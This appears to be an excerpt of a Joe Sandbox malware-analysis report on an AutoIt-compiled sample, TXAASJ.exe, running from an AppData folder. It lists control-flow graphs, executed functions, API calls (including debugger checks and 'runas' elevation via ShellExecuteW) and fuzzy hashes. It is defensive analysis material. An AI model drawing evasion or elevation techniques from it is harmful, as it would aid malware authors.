e6e5ac 108577->108578 108579 e6e6af LoadLibraryA 108577->108579 108578->108548 108578->108549 108579->108578 108580 e6e6c0 GetProcAddress 108579->108580 108580->108578 108581 e529c2 108582 e529cb 108581->108582 108583 e52a46 108582->108583 108584 e529e9 108582->108584 108585 e52a48 108582->108585 108586 e52a2b DefWindowProcW 108583->108586 108589 e529f6 108584->108589 108590 e52aac PostQuitMessage 108584->108590 108587 ec2307 108585->108587 108588 e52a4e 108585->108588 108596 e52a39 108586->108596 108593 e5322e 16 API calls 108587->108593 108591 e52a76 SetTimer RegisterWindowMessageW 108588->108591 108592 e52a53 108588->108592 108594 ec238f 108589->108594 108595 e52a01 108589->108595 108590->108596 108591->108596 108600 e52a9f CreatePopupMenu 108591->108600 108597 ec22aa 108592->108597 108598 e52a5a KillTimer 108592->108598 108599 ec232e 108593->108599 108633 e957fb 60 API calls _memset 108594->108633 108601 e52ab6 108595->108601 108602 e52a09 108595->108602 108604 ec22af 108597->108604 108605 ec22e3 MoveWindow 108597->108605 108626 e52b94 Shell_NotifyIconW _memset 108598->108626 108607 e6ec33 255 API calls 108599->108607 108600->108596 108628 e51e58 53 API calls _memset 108601->108628 108608 e52a14 108602->108608 108609 ec2374 108602->108609 108612 ec22d2 SetFocus 108604->108612 108613 ec22b3 108604->108613 108605->108596 108615 e52a1f 108607->108615 108608->108615 108616 ec235f 108608->108616 108609->108586 108632 e8b31f 48 API calls 108609->108632 108610 ec23a1 108610->108586 108610->108596 108612->108596 108613->108615 108618 ec22bc 108613->108618 108614 e52a6d 108627 e52ac7 DeleteObject DestroyWindow Mailbox 108614->108627 108615->108586 108629 e52b94 Shell_NotifyIconW _memset 108615->108629 108631 e95fdb 70 API calls _memset 108616->108631 108617 e52ac5 108617->108596 108622 e5322e 16 API calls 108618->108622 108622->108596 108624 ec2353 108630 e53598 67 API calls _memset 108624->108630 108626->108614 108627->108596 108628->108617 108629->108624 108630->108583 108631->108617 108632->108583 108633->108610

                                                                                                                        Executed Functions

                                                                                                                        Function 00E5374E Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 145windowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00E5376D
                                                                                                                          • Part of subcall function 00E54257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe,00000104,?,00000000,00000001,00000000), ref: 00E5428C
                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?), ref: 00E5377F
                                                                                                                        • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe,00000104,?,00F11120,C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe,00F11124,?,?), ref: 00E537EE
                                                                                                                          • Part of subcall function 00E534F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00E5352A
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E53860
                                                                                                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00F02934,00000010), ref: 00EC21C5
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00EC21FD
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00EC2232
                                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EEDAA4), ref: 00EC2290
                                                                                                                        • ShellExecuteW.SHELL32(00000000), ref: 00EC2297
                                                                                                                          • Part of subcall function 00E530A5: GetSysColorBrush.USER32(0000000F), ref: 00E530B0
                                                                                                                          • Part of subcall function 00E530A5: LoadCursorW.USER32(00000000,00007F00), ref: 00E530BF
                                                                                                                          • Part of subcall function 00E530A5: LoadIconW.USER32(00000063), ref: 00E530D5
                                                                                                                          • Part of subcall function 00E530A5: LoadIconW.USER32(000000A4), ref: 00E530E7
                                                                                                                          • Part of subcall function 00E530A5: LoadIconW.USER32(000000A2), ref: 00E530F9
                                                                                                                          • Part of subcall function 00E530A5: RegisterClassExW.USER32(?), ref: 00E53167
                                                                                                                          • Part of subcall function 00E52E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E52ECB
                                                                                                                          • Part of subcall function 00E52E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E52EEC
                                                                                                                          • Part of subcall function 00E52E9D: ShowWindow.USER32(00000000), ref: 00E52F00
                                                                                                                          • Part of subcall function 00E52E9D: ShowWindow.USER32(00000000), ref: 00E52F09
                                                                                                                          • Part of subcall function 00E53598: _memset.LIBCMT ref: 00E535BE
                                                                                                                          • Part of subcall function 00E53598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E53667
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                        • String ID: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                        • API String ID: 4253510256-3362726618
                                                                                                                        • Opcode ID: 741689157248338942c8fe692b93a0c199503e3f3fa1b20d25e59742ccb6afed
                                                                                                                        • Instruction ID: 72a2316a10358294bc47893785bc96a9a93662112dc52ff0c8bf044a5443775c
                                                                                                                        • Opcode Fuzzy Hash: 741689157248338942c8fe692b93a0c199503e3f3fa1b20d25e59742ccb6afed
                                                                                                                        • Instruction Fuzzy Hash: 66513A74644248BECB14ABB0EC46FED7BB8AB05755F10645EFF41B21D2C6704A4DEB22
                                                                                                                        Function 00E6E47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1147 e6e47b-e6e50a call e5d3d2 GetVersionExW call e57e53 call e6e5f8 call e6e617 1156 ec29f9-ec29fc 1147->1156 1157 e6e510-e6e511 1147->1157 1160 ec29fe 1156->1160 1161 ec2a15-ec2a19 1156->1161 1158 e6e513-e6e51e 1157->1158 1159 e6e54d-e6e55d call e6e6d1 1157->1159 1162 e6e524-e6e526 1158->1162 1163 ec297f-ec2985 1158->1163 1178 e6e582-e6e59c 1159->1178 1179 e6e55f-e6e57c GetCurrentProcess call e6e70e 1159->1179 1165 ec2a01 1160->1165 1166 ec2a1b-ec2a24 1161->1166 1167 ec2a04-ec2a0d 1161->1167 1168 ec299a-ec29a6 1162->1168 1169 e6e52c-e6e52f 1162->1169 1171 ec298f-ec2995 1163->1171 1172 ec2987-ec298a 1163->1172 1165->1167 1166->1165 1173 ec2a26-ec2a29 1166->1173 1167->1161 1174 ec29a8-ec29ab 1168->1174 1175 ec29b0-ec29b6 1168->1175 1176 e6e535-e6e544 1169->1176 1177 ec29c6-ec29c9 1169->1177 1171->1159 1172->1159 1173->1167 1174->1159 1175->1159 1180 ec29bb-ec29c1 1176->1180 1181 e6e54a 1176->1181 1177->1159 1182 ec29cf-ec29e4 1177->1182 1184 e6e59e-e6e5b2 call e6e694 1178->1184 1185 e6e5ec-e6e5f6 GetSystemInfo 1178->1185 1179->1178 1199 e6e57e 1179->1199 1180->1159 1181->1159 1187 ec29ee-ec29f4 1182->1187 1188 ec29e6-ec29e9 1182->1188 1194 e6e5e4-e6e5ea GetSystemInfo 1184->1194 1195 e6e5b4-e6e5bc call e6e437 GetNativeSystemInfo 1184->1195 1190 e6e5c9-e6e5d5 1185->1190 1187->1159 1188->1159 1192 e6e5d7-e6e5da FreeLibrary 1190->1192 1193 e6e5dc-e6e5e1 1190->1193 1192->1193 1198 e6e5be-e6e5c2 1194->1198 1195->1198 1198->1190 1201 e6e5c4-e6e5c7 FreeLibrary 1198->1201 1199->1178 1201->1190
                                                                                                                        APIs
                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00E6E4A7
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00EEDC28,?,?), ref: 00E6E567
                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,00EEDC28,?,?), ref: 00E6E5BC
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00E6E5C7
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00E6E5DA
                                                                                                                        • GetSystemInfo.KERNEL32(?,00EEDC28,?,?), ref: 00E6E5E4
                                                                                                                        • GetSystemInfo.KERNEL32(?,00EEDC28,?,?), ref: 00E6E5F0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2717633055-0
                                                                                                                        • Opcode ID: 51c4cd5549ed229e6bdaa08c6375e7d2acc48150a34d31250d0f270efe7e49e8
                                                                                                                        • Instruction ID: df28f41d353136cff1a5bb4b1bc5312f6afc5491141472ae62bcdaab9a26bc29
                                                                                                                        • Opcode Fuzzy Hash: 51c4cd5549ed229e6bdaa08c6375e7d2acc48150a34d31250d0f270efe7e49e8
                                                                                                                        • Instruction Fuzzy Hash: 4E61BEB580A384CFCF15CF68A8C15E97FA4AF2A308B1855DDD846AF387D634C909CB65
                                                                                                                        Function 00E531F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1219 e531f2-e5320a CreateStreamOnHGlobal 1220 e5320c-e53223 FindResourceExW 1219->1220 1221 e5322a-e5322d 1219->1221 1222 e53229 1220->1222 1223 ec57d3-ec57e2 LoadResource 1220->1223 1222->1221 1223->1222 1224 ec57e8-ec57f6 SizeofResource 1223->1224 1224->1222 1225 ec57fc-ec5807 LockResource 1224->1225 1225->1222 1226 ec580d-ec582b 1225->1226 1226->1222
                                                                                                                        APIs
                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E53202
                                                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00E53219
                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00EC57D7
                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00EC57EC
                                                                                                                        • LockResource.KERNEL32(?), ref: 00EC57FF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                        • String ID: SCRIPT
                                                                                                                        • API String ID: 3051347437-3967369404
                                                                                                                        • Opcode ID: a2ded9b1d979dc937fd8c0101e1456ddd7fc03271ab4c48960683d2dbd567812
                                                                                                                        • Instruction ID: 02fbe26b72c2fb7c66193ebf7a3f4340dc17a00af3372439a810e82c6019cc94
                                                                                                                        • Opcode Fuzzy Hash: a2ded9b1d979dc937fd8c0101e1456ddd7fc03271ab4c48960683d2dbd567812
                                                                                                                        • Instruction Fuzzy Hash: B2117075244701BFD7214B65FC48F677BB9EBC9B45F108429B802E6160DB71DD04C660
                                                                                                                        Function 00E5DCD0 Relevance: 3.5, APIs: 2, Instructions: 540COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b27a7fb66182eb9822860a1dca8efa2bf2097df6f487cfc94b2ac506d58ab30e
                                                                                                                        • Instruction ID: d5956fb64bb09a2e25130c9209e39aad68c6990463217b215847fdb45fa5dfa3
                                                                                                                        • Opcode Fuzzy Hash: b27a7fb66182eb9822860a1dca8efa2bf2097df6f487cfc94b2ac506d58ab30e
                                                                                                                        • Instruction Fuzzy Hash: 9A22AD70A04206CFDB24DF58C990BAAB7F0FF08305F149569EC5ABB391D771A989CB91
                                                                                                                        Function 00E5E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E5E279
                                                                                                                        • timeGetTime.WINMM ref: 00E5E51A
                                                                                                                        • TranslateMessage.USER32(?), ref: 00E5E646
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00E5E651
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E5E664
                                                                                                                        • LockWindowUpdate.USER32(00000000), ref: 00E5E697
                                                                                                                        • DestroyWindow.USER32 ref: 00E5E6A3
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E5E6BD
                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00EC5B15
                                                                                                                        • TranslateMessage.USER32(?), ref: 00EC62AF
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00EC62BD
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EC62D1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                        • API String ID: 2641332412-570651680
                                                                                                                        • Opcode ID: 5c707d73db5d67fd98102c2235094d44831694742fcb3ba2639130c2dc5e0ff1
                                                                                                                        • Instruction ID: d63a8249f31e0f31649629bcd9a627bd348bb9e8ca929545f52b5a39a3a0dbda
                                                                                                                        • Opcode Fuzzy Hash: 5c707d73db5d67fd98102c2235094d44831694742fcb3ba2639130c2dc5e0ff1
                                                                                                                        • Instruction Fuzzy Hash: 08620471508340DFDB28DF24C985FAA77E4BF44309F04686DED4AAB292D771E988CB52
                                                                                                                        Function 00E86A28 Relevance: 49.6, APIs: 26, Strings: 2, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___createFile.LIBCMT ref: 00E86C73
                                                                                                                        • ___createFile.LIBCMT ref: 00E86CB4
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00E86CDD
                                                                                                                        • __dosmaperr.LIBCMT ref: 00E86CE4
                                                                                                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00E86CF7
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00E86D1A
                                                                                                                        • __dosmaperr.LIBCMT ref: 00E86D23
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00E86D2C
                                                                                                                        • __set_osfhnd.LIBCMT ref: 00E86D5C
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00E86DC6
                                                                                                                        • __close_nolock.LIBCMT ref: 00E86DEC
                                                                                                                        • __chsize_nolock.LIBCMT ref: 00E86E1C
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00E86E2E
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00E86F26
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00E86F3B
                                                                                                                        • __close_nolock.LIBCMT ref: 00E86F9B
                                                                                                                          • Part of subcall function 00E7F84C: CloseHandle.KERNEL32(00000000,00EFEEC4,00000000,?,00E86DF1,00EFEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E7F89C
                                                                                                                          • Part of subcall function 00E7F84C: GetLastError.KERNEL32(?,00E86DF1,00EFEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E7F8A6
                                                                                                                          • Part of subcall function 00E7F84C: __free_osfhnd.LIBCMT ref: 00E7F8B3
                                                                                                                          • Part of subcall function 00E7F84C: __dosmaperr.LIBCMT ref: 00E7F8D5
                                                                                                                          • Part of subcall function 00E7889E: __getptd_noexit.LIBCMT ref: 00E7889E
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00E86FBD
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00E870F2
                                                                                                                        • ___createFile.LIBCMT ref: 00E87111
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E8711E
                                                                                                                        • __dosmaperr.LIBCMT ref: 00E87125
                                                                                                                        • __free_osfhnd.LIBCMT ref: 00E87145
                                                                                                                        • __invoke_watson.LIBCMT ref: 00E87173
                                                                                                                        • __wsopen_helper.LIBCMT ref: 00E8718D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                        • String ID: 9A$@
                                                                                                                        • API String ID: 3896587723-3249808769
                                                                                                                        • Opcode ID: 5bc2ddc159c8fc7853e1518c6b2f14784c6c87c4182f43913017a311ba9fe2dc
                                                                                                                        • Instruction ID: 3e1f17e5f0026d723014638af7d82248e3ffec50da128e2f782db3a3a87504e8
                                                                                                                        • Opcode Fuzzy Hash: 5bc2ddc159c8fc7853e1518c6b2f14784c6c87c4182f43913017a311ba9fe2dc
                                                                                                                        • Instruction Fuzzy Hash: 452256719042059FEB29BF68DC55BED7B60EB00328F28A229E56DBB2E2C735CD40D751
                                                                                                                        Function 00E51F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 546 e51f04-e51f9c call e52d1a * 2 call e5c935 * 2 call e57e53 call e5d3d2 * 3 563 ec2569-ec2575 call e72626 546->563 564 e51fa2-e51fa6 546->564 565 ec257d-ec2583 call e8e4ea 563->565 564->565 566 e51fac-e51faf 564->566 570 ec258f-ec259b call e5a4f6 565->570 569 e51fb5-e51fb8 566->569 566->570 569->570 572 e51fbe-e51fe3 GetForegroundWindow call e5200a call e5197e 569->572 578 ec2899-ec289d 570->578 579 ec25a1-ec25b1 call e5a4f6 570->579 589 e51fe4-e52007 call e55cd3 * 3 572->589 581 ec289f-ec28a6 call e5c935 578->581 582 ec28ab-ec28ae 578->582 579->578 592 ec25b7-ec25c5 579->592 581->582 586 ec28b7-ec28c4 582->586 587 ec28b0 582->587 590 ec28d6-ec28da 586->590 591 ec28c6-ec28d4 call e5b8a7 CharUpperBuffW 586->591 587->586 593 ec28dc-ec28df 590->593 594 ec28f1-ec28fa 590->594 591->590 597 ec25c9-ec25e1 call e8d68d 592->597 593->594 598 ec28e1-ec28ef call e5b8a7 CharUpperBuffW 593->598 599 ec28fc-ec2909 GetDesktopWindow EnumChildWindows 594->599 600 ec290b EnumWindows 594->600 597->578 608 ec25e7-ec25f7 call e6f885 597->608 598->594 605 ec2911-ec2930 call e8e44e call e52d1a 599->605 600->605 623 ec2940 605->623 624 ec2932-ec293b call e5200a 605->624 618 ec25fd-ec260d call e6f885 608->618 619 ec287b-ec288b call e6f885 608->619 630 ec2861-ec2871 call e6f885 618->630 631 ec2613-ec2623 call e6f885 618->631 628 ec288d-ec2891 619->628 629 ec2873-ec2876 619->629 624->623 628->589 632 ec2897 628->632 630->629 638 ec2842-ec2848 GetForegroundWindow 630->638 639 ec281d-ec2836 call e988a2 IsWindow 631->639 640 ec2629-ec2639 call e6f885 631->640 635 ec2852-ec2858 632->635 635->630 642 ec2849-ec2850 call e5200a 638->642 639->589 647 ec283c-ec2840 639->647 649 ec2659-ec2669 call e6f885 640->649 650 ec263b-ec2640 640->650 642->635 647->642 657 ec267a-ec268a call e6f885 649->657 658 ec266b-ec2675 649->658 652 ec280d-ec280f 650->652 653 ec2646-ec2657 call e55cf6 650->653 654 ec2817-ec2818 652->654 660 ec269b-ec26a7 call e55be9 653->660 654->589 666 ec268c-ec2698 call e55cf6 657->666 667 ec26b5-ec26c5 call e6f885 657->667 661 ec27e6-ec27f0 call e5c935 658->661 672 ec26ad-ec26b0 660->672 673 ec2811-ec2813 660->673 671 ec2804-ec2808 661->671 666->660 677 ec26c7-ec26de call e72241 667->677 678 ec26e3-ec26f3 call e6f885 667->678 671->597 672->671 673->654 677->671 683 ec26f5-ec270c call e72241 678->683 684 ec2711-ec2721 call e6f885 678->684 683->671 689 ec273f-ec274f call e6f885 684->689 690 ec2723-ec273a call e72241 684->690 695 ec276d-ec277d call e6f885 689->695 696 ec2751-ec2768 call e72241 689->696 690->671 701 ec277f-ec2793 call e72241 695->701 702 ec2795-ec27a5 call e6f885 695->702 696->671 701->671 707 ec27a7-ec27b7 call e6f885 702->707 708 ec27c3-ec27d3 call e6f885 702->708 707->629 713 ec27bd-ec27c1 707->713 714 ec27d5-ec27da 708->714 715 ec27f2-ec2802 call e8d614 708->715 713->671 716 ec27dc-ec27e2 714->716 717 ec2815 714->717 715->629 715->671 716->661 717->654
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                        • GetForegroundWindow.USER32 ref: 00E51FBE
                                                                                                                        • IsWindow.USER32(?), ref: 00EC282E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Foreground_memmove
                                                                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                        • API String ID: 3828923867-1919597938
                                                                                                                        • Opcode ID: 4c7ae5993bcc449df2d4070cfe0411417b6fa4f38f6513fbd5262cc9ff5b34b7
                                                                                                                        • Instruction ID: 4761beab41dd2b57dad01dc53053b34261c9b129f59d9cdab9721336c9565603
                                                                                                                        • Opcode Fuzzy Hash: 4c7ae5993bcc449df2d4070cfe0411417b6fa4f38f6513fbd5262cc9ff5b34b7
                                                                                                                        • Instruction Fuzzy Hash: E9D13831104302DBCB08EF14D980FA9BBE1BF54354F146A2DF956771A2CB31E95ADB92
                                                                                                                        Function 00E54257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe,00000104,?,00000000,00000001,00000000), ref: 00E5428C
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                          • Part of subcall function 00E71BC7: __wcsicmp_l.LIBCMT ref: 00E71C50
                                                                                                                        • _wcscpy.LIBCMT ref: 00E543C0
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00EC214E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
